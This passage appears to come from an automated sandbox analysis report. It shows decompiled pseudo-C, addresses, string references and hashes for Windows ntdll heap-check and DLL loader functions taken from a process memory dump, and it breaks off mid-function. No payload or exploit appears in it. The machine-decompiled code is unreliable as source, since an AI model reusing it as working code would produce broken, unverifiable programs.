                                                          0x01873f53
                                                          0x01873f58
                                                          0x01873f65
                                                          0x01873f65
                                                          0x01873f6a
                                                          0x00000000
                                                          0x01873f6a
                                                          0x01873edd
                                                          0x01873dda
                                                          0x01873ddd
                                                          0x01873de0
                                                          0x01873de5
                                                          0x018c8245
                                                          0x01873deb
                                                          0x01873df7
                                                          0x01873dfc
                                                          0x01873dfe
                                                          0x01873e01
                                                          0x01873e01
                                                          0x01873e06
                                                          0x018c824d
                                                          0x018c824f
                                                          0x018c8254
                                                          0x00000000
                                                          0x01873e0c
                                                          0x01873e11
                                                          0x01873e16
                                                          0x01873e19
                                                          0x01873e29
                                                          0x01873e2c
                                                          0x01873e2f
                                                          0x018c825c
                                                          0x018c825f
                                                          0x018c8261
                                                          0x018c8264
                                                          0x018c826c
                                                          0x018c8280
                                                          0x018c8282
                                                          0x018c8282
                                                          0x018c8289
                                                          0x018c8290
                                                          0x018c8293
                                                          0x018c8294
                                                          0x018c8298
                                                          0x018c829b
                                                          0x018c829b
                                                          0x01873e35
                                                          0x01873e38
                                                          0x01873e3d
                                                          0x01873e44
                                                          0x01873e58
                                                          0x018c82a3
                                                          0x018c82a3
                                                          0x01873e58
                                                          0x01873e60
                                                          0x01873e6f
                                                          0x01873e74
                                                          0x01873e77
                                                          0x01873e77
                                                          0x01873e7a
                                                          0x01873e7f
                                                          0x01873e8c
                                                          0x01873e8c
                                                          0x01873e91
                                                          0x00000000
                                                          0x01873e91

                                                          Strings
                                                          • Kernel-MUI-Number-Allowed, xrefs: 01873D8C
                                                          • Kernel-MUI-Language-SKU, xrefs: 01873F70
                                                          • WindowsExcludedProcs, xrefs: 01873D6F
                                                          • Kernel-MUI-Language-Allowed, xrefs: 01873DC0
                                                          • Kernel-MUI-Language-Disallowed, xrefs: 01873E97
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.763909960.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                          • API String ID: 0-258546922
                                                          • Opcode ID: bb7df455b73a8e667392045300903a00bfe32be1753816d1e09e30a6c50934f4
                                                          • Instruction ID: 0790ae31f3240f3eafb197f146720027429fa55a84c745f70ccdca5b2f764f79
                                                          • Opcode Fuzzy Hash: bb7df455b73a8e667392045300903a00bfe32be1753816d1e09e30a6c50934f4
                                                          • Instruction Fuzzy Hash: F8F12972D40619EBDB12DF98C984AEEBBB9FF19750F15006AE905E7210E734DB01CBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 29%
                                                          			E018640E1(void* __edx) {
                                                          				void* _t19;
                                                          				void* _t29;
                                                          
                                                          				_t28 = _t19;
                                                          				_t29 = __edx;
                                                          				if( *((intOrPtr*)(_t19 + 0x60)) != 0xeeffeeff) {
                                                          					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                          						_push("HEAP: ");
                                                          						E0186B150();
                                                          					} else {
                                                          						E0186B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                          					}
                                                          					E0186B150("Invalid heap signature for heap at %p", _t28);
                                                          					if(_t29 != 0) {
                                                          						E0186B150(", passed to %s", _t29);
                                                          					}
                                                          					_push("\n");
                                                          					E0186B150();
                                                          					if( *((char*)( *[fs:0x30] + 2)) != 0) {
                                                          						 *0x1956378 = 1;
                                                          						asm("int3");
                                                          						 *0x1956378 = 0;
                                                          					}
                                                          					return 0;
                                                          				}
                                                          				return 1;
                                                          			}





                                                          0x018640e6
                                                          0x018640e8
                                                          0x018640f1
                                                          0x018c042d
                                                          0x018c044c
                                                          0x018c0451
                                                          0x018c042f
                                                          0x018c0444
                                                          0x018c0449
                                                          0x018c045d
                                                          0x018c0466
                                                          0x018c046e
                                                          0x018c0474
                                                          0x018c0475
                                                          0x018c047a
                                                          0x018c048a
                                                          0x018c048c
                                                          0x018c0493
                                                          0x018c0494
                                                          0x018c0494
                                                          0x00000000
                                                          0x018c049b
                                                          0x00000000

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.763909960.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlAllocateHeap
                                                          • API String ID: 0-188067316
                                                          • Opcode ID: dc509c61d8ef060d273b059608b37e1b4b2321edd1e904e9848f3aeb32829c56
                                                          • Instruction ID: cac6835c0f0fd976e9ee12c9e29b192a051c724575b843a5b6a41a4a7385e0ec
                                                          • Opcode Fuzzy Hash: dc509c61d8ef060d273b059608b37e1b4b2321edd1e904e9848f3aeb32829c56
                                                          • Instruction Fuzzy Hash: 9701F537204A45EFD22A976DA48DB52B7A8DB01F7CF28402DF004D7741DAB89640C212
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 44%
                                                          			E01898E00(void* __ecx) {
                                                          				signed int _v8;
                                                          				char _v12;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				intOrPtr* _t32;
                                                          				intOrPtr _t35;
                                                          				intOrPtr _t43;
                                                          				void* _t46;
                                                          				intOrPtr _t47;
                                                          				void* _t48;
                                                          				signed int _t49;
                                                          				void* _t50;
                                                          				intOrPtr* _t51;
                                                          				signed int _t52;
                                                          				void* _t53;
                                                          				intOrPtr _t55;
                                                          
                                                          				_v8 =  *0x195d360 ^ _t52;
                                                          				_t49 = 0;
                                                          				_t48 = __ecx;
                                                          				_t55 =  *0x1958464; // 0x73b80110
                                                          				if(_t55 == 0) {
                                                          					L9:
                                                          					if( !_t49 >= 0) {
                                                          						if(( *0x1955780 & 0x00000003) != 0) {
                                                          							E018E5510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
                                                          						}
                                                          						if(( *0x1955780 & 0x00000010) != 0) {
                                                          							asm("int3");
                                                          						}
                                                          					}
                                                          					return E018AB640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
                                                          				}
                                                          				_t47 =  *((intOrPtr*)(__ecx + 0x18));
                                                          				_t43 =  *0x1957984; // 0x15a2b20
                                                          				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
                                                          					_t32 =  *((intOrPtr*)(_t48 + 0x28));
                                                          					if(_t48 == _t43) {
                                                          						_t50 = 0x5c;
                                                          						if( *_t32 == _t50) {
                                                          							_t46 = 0x3f;
                                                          							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
                                                          								_t32 = _t32 + 8;
                                                          							}
                                                          						}
                                                          					}
                                                          					_t51 =  *0x1958464; // 0x73b80110
                                                          					 *0x195b1e0(_t47, _t32,  &_v12);
                                                          					_t49 =  *_t51();
                                                          					if(_t49 >= 0) {
                                                          						L8:
                                                          						_t35 = _v12;
                                                          						if(_t35 != 0) {
                                                          							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
                                                          								E01899B10( *((intOrPtr*)(_t48 + 0x48)));
                                                          								_t35 = _v12;
                                                          							}
                                                          							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
                                                          						}
                                                          						goto L9;
                                                          					}
                                                          					if(_t49 != 0xc000008a) {
                                                          						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
                                                          							if(_t49 != 0xc00000bb) {
                                                          								goto L8;
                                                          							}
                                                          						}
                                                          					}
                                                          					if(( *0x1955780 & 0x00000005) != 0) {
                                                          						_push(_t49);
                                                          						E018E5510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
                                                          						_t53 = _t53 + 0x1c;
                                                          					}
                                                          					_t49 = 0;
                                                          					goto L8;
                                                          				} else {
                                                          					goto L9;
                                                          				}
                                                          			}




















                                                          0x01898e0f
                                                          0x01898e16
                                                          0x01898e19
                                                          0x01898e1b
                                                          0x01898e21
                                                          0x01898e7f
                                                          0x01898e85
                                                          0x018d9354
                                                          0x018d936c
                                                          0x018d9371
                                                          0x018d937b
                                                          0x018d9381
                                                          0x018d9381
                                                          0x018d937b
                                                          0x01898e9d
                                                          0x01898e9d
                                                          0x01898e29
                                                          0x01898e2c
                                                          0x01898e38
                                                          0x01898e3e
                                                          0x01898e43
                                                          0x01898eb5
                                                          0x01898eb9
                                                          0x018d92aa
                                                          0x018d92af
                                                          0x018d92e8
                                                          0x018d92e8
                                                          0x018d92af
                                                          0x01898eb9
                                                          0x01898e45
                                                          0x01898e53
                                                          0x01898e5b
                                                          0x01898e5f
                                                          0x01898e78
                                                          0x01898e78
                                                          0x01898e7d
                                                          0x01898ec3
                                                          0x01898ecd
                                                          0x01898ed2
                                                          0x01898ed2
                                                          0x01898ec5
                                                          0x01898ec5
                                                          0x00000000
                                                          0x01898e7d
                                                          0x01898e67
                                                          0x01898ea4
                                                          0x018d931a
                                                          0x00000000
                                                          0x00000000
                                                          0x018d9320
                                                          0x01898ea4
                                                          0x01898e70
                                                          0x018d9325
                                                          0x018d9340
                                                          0x018d9345
                                                          0x018d9345
                                                          0x01898e76
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000

                                                          Strings
                                                          • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 018D932A
                                                          • Querying the active activation context failed with status 0x%08lx, xrefs: 018D9357
                                                          • minkernel\ntdll\ldrsnap.c, xrefs: 018D933B, 018D9367
                                                          • LdrpFindDllActivationContext, xrefs: 018D9331, 018D935D
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.763909960.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                          • API String ID: 0-3779518884
                                                          • Opcode ID: e1af7fc7dd3a84a8df141140703d25d22af786d66fe28d8bef88c504d0ad8345
                                                          • Instruction ID: 30a175f3f88484ba2658080601c3e18ad3538f976c4822864e760b7c614fb90c
                                                          • Opcode Fuzzy Hash: e1af7fc7dd3a84a8df141140703d25d22af786d66fe28d8bef88c504d0ad8345
                                                          • Instruction Fuzzy Hash: 1B41EC32A0031F9FEF356A5DC8A9A7D77A5B703758F0E4169E904D7192EB746F808381
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.763909960.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                          • API String ID: 2994545307-336120773
                                                          • Opcode ID: 832cf6bc214329d12c89cca00ce10bed050729d490efda1d86e29b844f8454be
                                                          • Instruction ID: 2ae1939ffb61d73c21306c7e9751051e163b6a7461d1ee5c127ff48c961a2287
                                                          • Opcode Fuzzy Hash: 832cf6bc214329d12c89cca00ce10bed050729d490efda1d86e29b844f8454be
                                                          • Instruction Fuzzy Hash: 83312472300524FFD721DB9DC889F6B77ACEF00B29F144469F509CB245EA70AA80CB59
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 83%
                                                          			E01878794(void* __ecx) {
                                                          				signed int _v0;
                                                          				char _v8;
                                                          				signed int _v12;
                                                          				void* _v16;
                                                          				signed int _v20;
                                                          				intOrPtr _v24;
                                                          				signed int _v28;
                                                          				signed int _v32;
                                                          				signed int _v40;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				void* __ebp;
                                                          				intOrPtr* _t77;
                                                          				signed int _t80;
                                                          				signed char _t81;
                                                          				signed int _t87;
                                                          				signed int _t91;
                                                          				void* _t92;
                                                          				void* _t94;
                                                          				signed int _t95;
                                                          				signed int _t103;
                                                          				signed int _t105;
                                                          				signed int _t110;
                                                          				signed int _t118;
                                                          				intOrPtr* _t121;
                                                          				intOrPtr _t122;
                                                          				signed int _t125;
                                                          				signed int _t129;
                                                          				signed int _t131;
                                                          				signed int _t134;
                                                          				signed int _t136;
                                                          				signed int _t143;
                                                          				signed int* _t147;
                                                          				signed int _t151;
                                                          				void* _t153;
                                                          				signed int* _t157;
                                                          				signed int _t159;
                                                          				signed int _t161;
                                                          				signed int _t166;
                                                          				signed int _t168;
                                                          
                                                          				_push(__ecx);
                                                          				_t153 = __ecx;
                                                          				_t159 = 0;
                                                          				_t121 = __ecx + 0x3c;
                                                          				if( *_t121 == 0) {
                                                          					L2:
                                                          					_t77 =  *((intOrPtr*)(_t153 + 0x58));
                                                          					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
                                                          						_t122 =  *((intOrPtr*)(_t153 + 0x20));
                                                          						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
                                                          						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
                                                          							L6:
                                                          							if(E0187934A() != 0) {
                                                          								_t159 = E018EA9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
                                                          								__eflags = _t159;
                                                          								if(_t159 < 0) {
                                                          									_t81 =  *0x1955780; // 0x0
                                                          									__eflags = _t81 & 0x00000003;
                                                          									if((_t81 & 0x00000003) != 0) {
                                                          										_push(_t159);
                                                          										E018E5510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
                                                          										_t81 =  *0x1955780; // 0x0
                                                          									}
                                                          									__eflags = _t81 & 0x00000010;
                                                          									if((_t81 & 0x00000010) != 0) {
                                                          										asm("int3");
                                                          									}
                                                          								}
                                                          							}
                                                          						} else {
                                                          							_t159 = E0187849B(0, _t122, _t153, _t159, _t180);
                                                          							if(_t159 >= 0) {
                                                          								goto L6;
                                                          							}
                                                          						}
                                                          						_t80 = _t159;
                                                          						goto L8;
                                                          					} else {
                                                          						_t125 = 0x13;
                                                          						asm("int 0x29");
                                                          						_push(0);
                                                          						_push(_t159);
                                                          						_t161 = _t125;
                                                          						_t87 =  *( *[fs:0x30] + 0x1e8);
                                                          						_t143 = 0;
                                                          						_v40 = _t161;
                                                          						_t118 = 0;
                                                          						_push(_t153);
                                                          						__eflags = _t87;
                                                          						if(_t87 != 0) {
                                                          							_t118 = _t87 + 0x5d8;
                                                          							__eflags = _t118;
                                                          							if(_t118 == 0) {
                                                          								L46:
                                                          								_t118 = 0;
                                                          							} else {
                                                          								__eflags =  *(_t118 + 0x30);
                                                          								if( *(_t118 + 0x30) == 0) {
                                                          									goto L46;
                                                          								}
                                                          							}
                                                          						}
                                                          						_v32 = 0;
                                                          						_v28 = 0;
                                                          						_v16 = 0;
                                                          						_v20 = 0;
                                                          						_v12 = 0;
                                                          						__eflags = _t118;
                                                          						if(_t118 != 0) {
                                                          							__eflags = _t161;
                                                          							if(_t161 != 0) {
                                                          								__eflags =  *(_t118 + 8);
                                                          								if( *(_t118 + 8) == 0) {
                                                          									L22:
                                                          									_t143 = 1;
                                                          									__eflags = 1;
                                                          								} else {
                                                          									_t19 = _t118 + 0x40; // 0x40
                                                          									_t156 = _t19;
                                                          									E01878999(_t19,  &_v16);
                                                          									__eflags = _v0;
                                                          									if(_v0 != 0) {
                                                          										__eflags = _v0 - 1;
                                                          										if(_v0 != 1) {
                                                          											goto L22;
                                                          										} else {
                                                          											_t128 =  *(_t161 + 0x64);
                                                          											__eflags =  *(_t161 + 0x64);
                                                          											if( *(_t161 + 0x64) == 0) {
                                                          												goto L22;
                                                          											} else {
                                                          												E01878999(_t128,  &_v12);
                                                          												_t147 = _v12;
                                                          												_t91 = 0;
                                                          												__eflags = 0;
                                                          												_t129 =  *_t147;
                                                          												while(1) {
                                                          													__eflags =  *((intOrPtr*)(0x1955c60 + _t91 * 8)) - _t129;
                                                          													if( *((intOrPtr*)(0x1955c60 + _t91 * 8)) == _t129) {
                                                          														break;
                                                          													}
                                                          													_t91 = _t91 + 1;
                                                          													__eflags = _t91 - 5;
                                                          													if(_t91 < 5) {
                                                          														continue;
                                                          													} else {
                                                          														_t131 = 0;
                                                          														__eflags = 0;
                                                          													}
                                                          													L37:
                                                          													__eflags = _t131;
                                                          													if(_t131 != 0) {
                                                          														goto L22;
                                                          													} else {
                                                          														__eflags = _v16 - _t147;
                                                          														if(_v16 != _t147) {
                                                          															goto L22;
                                                          														} else {
                                                          															E01882280(_t92, 0x19586cc);
                                                          															_t94 = E01939DFB( &_v20);
                                                          															__eflags = _t94 - 1;
                                                          															if(_t94 != 1) {
                                                          															}
                                                          															asm("movsd");
                                                          															asm("movsd");
                                                          															asm("movsd");
                                                          															asm("movsd");
                                                          															 *_t118 =  *_t118 + 1;
                                                          															asm("adc dword [ebx+0x4], 0x0");
                                                          															_t95 = E018961A0( &_v32);
                                                          															__eflags = _t95;
                                                          															if(_t95 != 0) {
                                                          																__eflags = _v32 | _v28;
                                                          																if((_v32 | _v28) != 0) {
                                                          																	_t71 = _t118 + 0x40; // 0x3f
                                                          																	_t134 = _t71;
                                                          																	goto L55;
                                                          																}
                                                          															}
                                                          															goto L30;
                                                          														}
                                                          													}
                                                          													goto L56;
                                                          												}
                                                          												_t92 = 0x1955c64 + _t91 * 8;
                                                          												asm("lock xadd [eax], ecx");
                                                          												_t131 = (_t129 | 0xffffffff) - 1;
                                                          												goto L37;
                                                          											}
                                                          										}
                                                          										goto L56;
                                                          									} else {
                                                          										_t143 = E01878A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
                                                          										__eflags = _t143;
                                                          										if(_t143 != 0) {
                                                          											_t157 = _v12;
                                                          											_t103 = 0;
                                                          											__eflags = 0;
                                                          											_t136 =  &(_t157[1]);
                                                          											 *(_t161 + 0x64) = _t136;
                                                          											_t151 =  *_t157;
                                                          											_v20 = _t136;
                                                          											while(1) {
                                                          												__eflags =  *((intOrPtr*)(0x1955c60 + _t103 * 8)) - _t151;
                                                          												if( *((intOrPtr*)(0x1955c60 + _t103 * 8)) == _t151) {
                                                          													break;
                                                          												}
                                                          												_t103 = _t103 + 1;
                                                          												__eflags = _t103 - 5;
                                                          												if(_t103 < 5) {
                                                          													continue;
                                                          												}
                                                          												L21:
                                                          												_t105 = E018AF380(_t136, 0x1841184, 0x10);
                                                          												__eflags = _t105;
                                                          												if(_t105 != 0) {
                                                          													__eflags =  *_t157 -  *_v16;
                                                          													if( *_t157 >=  *_v16) {
                                                          														goto L22;
                                                          													} else {
                                                          														asm("cdq");
                                                          														_t166 = _t157[5] & 0x0000ffff;
                                                          														_t108 = _t157[5] & 0x0000ffff;
                                                          														asm("cdq");
                                                          														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
                                                          														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
                                                          														if(__eflags > 0) {
                                                          															L29:
                                                          															E01882280(_t108, 0x19586cc);
                                                          															 *_t118 =  *_t118 + 1;
                                                          															_t42 = _t118 + 0x40; // 0x3f
                                                          															_t156 = _t42;
                                                          															asm("adc dword [ebx+0x4], 0x0");
                                                          															asm("movsd");
                                                          															asm("movsd");
                                                          															asm("movsd");
                                                          															asm("movsd");
                                                          															_t110 = E018961A0( &_v32);
                                                          															__eflags = _t110;
                                                          															if(_t110 != 0) {
                                                          																__eflags = _v32 | _v28;
                                                          																if((_v32 | _v28) != 0) {
                                                          																	_t134 = _v20;
                                                          																	L55:
                                                          																	E01939D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
                                                          																}
                                                          															}
                                                          															L30:
                                                          															 *_t118 =  *_t118 + 1;
                                                          															asm("adc dword [ebx+0x4], 0x0");
                                                          															E0187FFB0(_t118, _t156, 0x19586cc);
                                                          															goto L22;
                                                          														} else {
                                                          															if(__eflags < 0) {
                                                          																goto L22;
                                                          															} else {
                                                          																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
                                                          																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
                                                          																	goto L22;
                                                          																} else {
                                                          																	goto L29;
                                                          																}
                                                          															}
                                                          														}
                                                          													}
                                                          													goto L56;
                                                          												}
                                                          												goto L22;
                                                          											}
                                                          											asm("lock inc dword [eax]");
                                                          											goto L21;
                                                          										}
                                                          									}
                                                          								}
                                                          							}
                                                          						}
                                                          						return _t143;
                                                          					}
                                                          				} else {
                                                          					_push( &_v8);
                                                          					_push( *((intOrPtr*)(__ecx + 0x50)));
                                                          					_push(__ecx + 0x40);
                                                          					_push(_t121);
                                                          					_push(0xffffffff);
                                                          					_t80 = E018A9A00();
                                                          					_t159 = _t80;
                                                          					if(_t159 < 0) {
                                                          						L8:
                                                          						return _t80;
                                                          					} else {
                                                          						goto L2;
                                                          					}
                                                          				}
                                                          				L56:
                                                          			}












































                                                          0x01878799
                                                          0x0187879d
                                                          0x018787a1
                                                          0x018787a3
                                                          0x018787a8
                                                          0x018787c3
                                                          0x018787c3
                                                          0x018787c8
                                                          0x018787d1
                                                          0x018787d4
                                                          0x018787d8
                                                          0x018787e5
                                                          0x018787ec
                                                          0x018c9bfe
                                                          0x018c9c00
                                                          0x018c9c02
                                                          0x018c9c08
                                                          0x018c9c0d
                                                          0x018c9c0f
                                                          0x018c9c14
                                                          0x018c9c2d
                                                          0x018c9c32
                                                          0x018c9c37
                                                          0x018c9c3a
                                                          0x018c9c3c
                                                          0x018c9c42
                                                          0x018c9c42
                                                          0x018c9c3c
                                                          0x018c9c02
                                                          0x018787da
                                                          0x018787df
                                                          0x018787e3
                                                          0x00000000
                                                          0x00000000
                                                          0x018787e3
                                                          0x018787f2
                                                          0x00000000
                                                          0x018787fb
                                                          0x018787fd
                                                          0x018787fe
                                                          0x0187880e
                                                          0x0187880f
                                                          0x01878810
                                                          0x01878814
                                                          0x0187881a
                                                          0x0187881c
                                                          0x0187881f
                                                          0x01878821
                                                          0x01878822
                                                          0x01878824
                                                          0x01878826
                                                          0x0187882c
                                                          0x0187882e
                                                          0x018c9c48
                                                          0x018c9c48
                                                          0x01878834
                                                          0x01878834
                                                          0x01878837
                                                          0x00000000
                                                          0x00000000
                                                          0x01878837
                                                          0x0187882e
                                                          0x0187883d
                                                          0x01878840
                                                          0x01878843
                                                          0x01878846
                                                          0x01878849
                                                          0x0187884c
                                                          0x0187884e
                                                          0x01878850
                                                          0x01878852
                                                          0x01878854
                                                          0x01878857
                                                          0x018788b4
                                                          0x018788b6
                                                          0x018788b6
                                                          0x01878859
                                                          0x01878859
                                                          0x01878859
                                                          0x01878861
                                                          0x01878866
                                                          0x0187886a
                                                          0x0187893d
                                                          0x01878941
                                                          0x00000000
                                                          0x01878947
                                                          0x01878947
                                                          0x0187894a
                                                          0x0187894c
                                                          0x00000000
                                                          0x01878952
                                                          0x01878955
                                                          0x0187895a
                                                          0x0187895d
                                                          0x0187895d
                                                          0x0187895f
                                                          0x01878961
                                                          0x01878961
                                                          0x01878968
                                                          0x00000000
                                                          0x00000000
                                                          0x0187896a
                                                          0x0187896b
                                                          0x0187896e
                                                          0x00000000
                                                          0x01878970
                                                          0x01878970
                                                          0x01878970
                                                          0x01878970
                                                          0x01878972
                                                          0x01878972
                                                          0x01878974
                                                          0x00000000
                                                          0x0187897a
                                                          0x0187897a
                                                          0x0187897d
                                                          0x00000000
                                                          0x01878983
                                                          0x018c9c65
                                                          0x018c9c6d
                                                          0x018c9c72
                                                          0x018c9c75
                                                          0x018c9c75
                                                          0x018c9c82
                                                          0x018c9c86
                                                          0x018c9c87
                                                          0x018c9c88
                                                          0x018c9c89
                                                          0x018c9c8c
                                                          0x018c9c90
                                                          0x018c9c95
                                                          0x018c9c97
                                                          0x018c9ca0
                                                          0x018c9ca3
                                                          0x018c9ca9
                                                          0x018c9ca9
                                                          0x00000000
                                                          0x018c9ca9
                                                          0x018c9ca3
                                                          0x00000000
                                                          0x018c9c97
                                                          0x0187897d
                                                          0x00000000
                                                          0x01878974
                                                          0x01878988
                                                          0x01878992
                                                          0x01878996
                                                          0x00000000
                                                          0x01878996
                                                          0x0187894c
                                                          0x00000000
                                                          0x01878870
                                                          0x0187887b
                                                          0x0187887d
                                                          0x0187887f
                                                          0x01878881
                                                          0x01878884
                                                          0x01878884
                                                          0x01878886
                                                          0x01878889
                                                          0x0187888c
                                                          0x0187888e
                                                          0x01878891
                                                          0x01878891
                                                          0x01878898
                                                          0x00000000
                                                          0x00000000
                                                          0x0187889a
                                                          0x0187889b
                                                          0x0187889e
                                                          0x00000000
                                                          0x00000000
                                                          0x018788a0
                                                          0x018788a8
                                                          0x018788b0
                                                          0x018788b2
                                                          0x018788d3
                                                          0x018788d5
                                                          0x00000000
                                                          0x018788d7
                                                          0x018788db
                                                          0x018788dc
                                                          0x018788e0
                                                          0x018788e8
                                                          0x018788ee
                                                          0x018788f0
                                                          0x018788f3
                                                          0x018788fc
                                                          0x01878901
                                                          0x01878906
                                                          0x0187890c
                                                          0x0187890c
                                                          0x0187890f
                                                          0x01878916
                                                          0x01878917
                                                          0x01878918
                                                          0x01878919
                                                          0x0187891a
                                                          0x0187891f
                                                          0x01878921
                                                          0x018c9c52
                                                          0x018c9c55
                                                          0x018c9c5b
                                                          0x018c9cac
                                                          0x018c9cc0
                                                          0x018c9cc0
                                                          0x018c9c55
                                                          0x01878927
                                                          0x01878927
                                                          0x0187892f
                                                          0x01878933
                                                          0x00000000
                                                          0x018788f5
                                                          0x018788f5
                                                          0x00000000
                                                          0x018788f7
                                                          0x018788f7
                                                          0x018788fa
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x018788fa
                                                          0x018788f5
                                                          0x018788f3
                                                          0x00000000
                                                          0x018788d5
                                                          0x00000000
                                                          0x018788b2
                                                          0x018788c9
                                                          0x00000000
                                                          0x018788c9
                                                          0x0187887f
                                                          0x0187886a
                                                          0x01878857
                                                          0x01878852
                                                          0x018788bf
                                                          0x018788bf
                                                          0x018787aa
                                                          0x018787ad
                                                          0x018787ae
                                                          0x018787b4
                                                          0x018787b5
                                                          0x018787b6
                                                          0x018787b8
                                                          0x018787bd
                                                          0x018787c1
                                                          0x018787f4
                                                          0x018787fa
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x018787c1
                                                          0x00000000

                                                          Strings
                                                          • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 018C9C18
                                                          • LdrpDoPostSnapWork, xrefs: 018C9C1E
                                                          • minkernel\ntdll\ldrsnap.c, xrefs: 018C9C28
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.763909960.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                                          • API String ID: 2994545307-1948996284
                                                          • Opcode ID: 25d0adbdcc6b0ecac9e83a4931384f3c8bb29c619ad00f70a59d157805b8413b
                                                          • Instruction ID: 7d68d421f1f327f78d27d4729f214bdd3dd9f1c589bdff7fde4ad6c07717b416
                                                          • Opcode Fuzzy Hash: 25d0adbdcc6b0ecac9e83a4931384f3c8bb29c619ad00f70a59d157805b8413b
                                                          • Instruction Fuzzy Hash: 96910471A0021ADFEF18DF5DD488ABABBB5FF46318B1541A9D905EB241DB30EB01CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 98%
                                                          			E01877E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                                          				char _v8;
                                                          				intOrPtr _v12;
                                                          				intOrPtr _v16;
                                                          				intOrPtr _v20;
                                                          				char _v24;
                                                          				signed int _t73;
                                                          				void* _t77;
                                                          				char* _t82;
                                                          				char* _t87;
                                                          				signed char* _t97;
                                                          				signed char _t102;
                                                          				intOrPtr _t107;
                                                          				signed char* _t108;
                                                          				intOrPtr _t112;
                                                          				intOrPtr _t124;
                                                          				intOrPtr _t125;
                                                          				intOrPtr _t126;
                                                          
                                                          				_t107 = __edx;
                                                          				_v12 = __ecx;
                                                          				_t125 =  *((intOrPtr*)(__ecx + 0x20));
                                                          				_t124 = 0;
                                                          				_v20 = __edx;
                                                          				if(E0187CEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
                                                          					_t112 = _v8;
                                                          				} else {
                                                          					_t112 = 0;
                                                          					_v8 = 0;
                                                          				}
                                                          				if(_t112 != 0) {
